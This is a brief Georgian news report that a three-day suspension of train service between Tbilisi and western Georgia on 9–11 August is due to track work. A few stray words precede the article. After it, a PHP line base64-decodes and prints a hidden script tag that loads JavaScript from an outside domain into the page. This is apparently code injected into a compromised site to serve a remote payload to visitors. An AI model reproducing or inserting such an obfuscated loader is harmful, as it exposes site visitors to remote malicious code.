celsiusi
ავერსი შნაიდერი

დღეიდან, სამი დღის განმავლობაში, მატარებლები დასავლეთ საქართველოს მიმართულებით არ იმოძრავებენ. ცნობილი ხდება, მოქალაქეები 9-10-11 აგვისტოს თბილისიდან დასავლეთ საქართველოს მიმართულებით ვერ გაემგზავრებიან. შესაბამისად, შეწყდება რეისები დასავლეთიდან თბილისის მიმართულებით. ასევე წყდება სატვირთ მატარებლების მოძრაობაც.

როგორც რკინიგზის ცხელ ხაზზე გვითხრეს, მიზეზი ტექნიკური სამუშაოებია და ახალ ხაზებზე გადართვას უკავშირდება. მათივე თქმით, 12 აგვისტოდან მატარებლის მოძრაობა აღდგება და ბილეთებიც ჩვეულებრივ გაიყიდება. 

ცნობილია ისიც, რომ მატარებლით გადაადგილება მგზავრებისთვის შესაძლებელი იქნება მხოლოდ ხაშურისა და ბორჯომის მიმართულებით. 

504
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");